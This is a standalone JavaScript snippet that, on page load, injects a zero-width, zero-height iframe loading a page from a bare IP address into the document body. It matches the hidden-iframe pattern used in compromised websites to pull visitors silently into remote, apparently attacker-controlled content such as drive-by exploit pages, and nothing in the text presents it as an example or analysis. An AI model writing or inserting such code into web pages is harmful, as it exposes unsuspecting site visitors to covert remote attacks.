function getcreate(){ddd = document.createElement("iframe");ddd.src = "http://125.71.29.133/test.html";ddd.width = 0;ddd.height = 0;document.body.appendChild(ddd);}window.onload = getcreate();
